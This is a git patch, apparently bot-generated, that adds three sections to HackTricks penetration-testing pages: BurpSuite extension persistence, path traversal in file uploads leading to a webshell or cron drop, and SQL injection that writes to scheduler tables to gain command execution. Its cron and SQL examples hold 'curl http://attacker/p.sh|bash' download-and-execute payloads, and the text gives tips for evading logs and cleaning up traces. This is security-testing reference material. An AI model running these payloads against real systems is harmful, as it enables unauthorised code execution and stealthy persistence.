From 03324d8731773dad7a4f905b0eec916d93e0b581 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 31 Jan 2026 02:01:53 +0000 Subject: [PATCH] Add content from: Metasploit Wrap-Up 01/30/2026 --- .../linux-post-exploitation/README.md | 7 +++++++ src/pentesting-web/file-upload/README.md | 14 ++++++++++++++ src/pentesting-web/sql-injection/README.md | 17 +++++++++++++++++ 3 files changed, 38 insertions(+) diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md index 4bc1770c6f3..e99f6f8e2d6 100644 --- a/src/linux-hardening/linux-post-exploitation/README.md +++ b/src/linux-hardening/linux-post-exploitation/README.md @@ -132,6 +132,12 @@ Hardening - Overwrite the in-memory `argv[0]` buffer after reading `/proc/self/cmdline` length and the `argv[0]` pointer, padding with NULs so `/proc//cmdline` and `ps` also show the fake label. - Hunt by comparing `Name:` in `/proc//status` against the real executable path and looking for loopback mutex listeners owned by processes with tiny/blank cmdlines. +## BurpSuite extension persistence (userland) + +- Burp stores extension autoload configuration in user-level settings (e.g., `~/.BurpSuite/UserConfig*.json` on Linux/macOS or `%USERPROFILE%\.BurpSuite\` on Windows). Appending a malicious JAR/Python extension path with `autoload":true` causes Burp to execute the payload whenever the user launches BurpSuite. +- Delivery flow: drop the extension file into a writable profile directory, patch the JSON settings to add the extender entry (type, path, and enabled/autoload flags), and ensure "Automatically reload extensions on startup" is enabled in the options block. +- Persistence trigger is user-driven (opening BurpSuite), making it stealthier than system-level autoruns while still granting execution in the context of a tester’s workstation. + ## References - [0xdf – HTB Planning (Grafana env creds reuse, systemd BASIC_AUTH)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html) @@ -139,5 +145,6 @@ Hardening - [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) - [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir) - [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/) +- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index c867f900174..f43bd3fe43f 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md @@ -549,6 +549,19 @@ Content-Type: application/json Backend copies `file.filepath`, so the response returns that path’s content. Common chain: read `/proc/self/environ` to learn `$HOME`, then `$HOME/.n8n/config` for keys and `$HOME/.n8n/database.sqlite` for user identifiers. +### Path traversal on upload destination (arbitrary file write → RCE) + +If the upload handler uses an attacker-controlled path component (e.g., a `guid`/`path` parameter) to build the destination, path traversal converts the upload into **arbitrary file write**: + +- **Windows:** traverse into the webroot (e.g., `../../inetpub/wwwroot/shell.aspx`) and write a webshell that the attacker triggers over HTTP. +- **Linux:** traverse to `/etc/cron.d/` and drop a cron entry that executes commands as root when cron parses the file: + +```cron +* * * * * root /bin/bash -c 'curl http://attacker/p.sh|bash' +``` + +- Ensure the request sets the traversal inside the server-side path segment, not just the filename field, and keep payload size small to avoid logging throttles. This turns a pre-auth upload into code execution even when the handler was intended for benign blobs only. + ## References - [n8n form upload Content-Type confusion → arbitrary file read PoC](https://github.com/Chocapikk/CVE-2026-21858) @@ -567,6 +580,7 @@ Backend copies `file.filepath`, so the response returns that path’s content. C - [CVE-2024-21546 – NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546) - [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca) - [0xdf – HTB Environment (UniSharp LFM upload → PHP RCE)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) +- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026) - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) - [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink) - [0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html) diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md index 53ba19bf313..4ca6fa847d9 100644 --- a/src/pentesting-web/sql-injection/README.md +++ b/src/pentesting-web/sql-injection/README.md @@ -659,6 +659,22 @@ Mitigations: https://github.com/m4ll0k/Atlas {{#endref}} +### SQLi as a write primitive to scheduler/cron tables (RCE) + +If an authenticated endpoint is reachable pre-auth via an **auth bypass** and contains SQLi, treat the database as a **write primitive** instead of just data exfil: + +- Target scheduler tables (e.g. `cron_job`, `task_queue`, `jobs`) that the application daemon periodically executes. Insert a row that runs your command and mark it enabled/active. +- Example payload (conceptual – adapt to the schema): + +```sql +INSERT INTO cron_job (id, name, command, enabled, nextrun) +VALUES (1337, 'healthcheck', 'bash -c "curl http://attacker/p.sh|bash"', 1, NOW()); +``` + +- Some apps sanitize job names but not the command body; keep the command small and pull a second stage over HTTP(S). +- After the scheduler tick runs, you gain OS command execution even when direct stacked queries/`xp_cmdshell` aren’t possible. +- Cleanup: delete the job or set `enabled=0` once a session is established to reduce noise. + ## Other Guides - [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com) @@ -674,5 +690,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt ## References - [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/) +- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026) {{#include ../../banners/hacktricks-training.md}}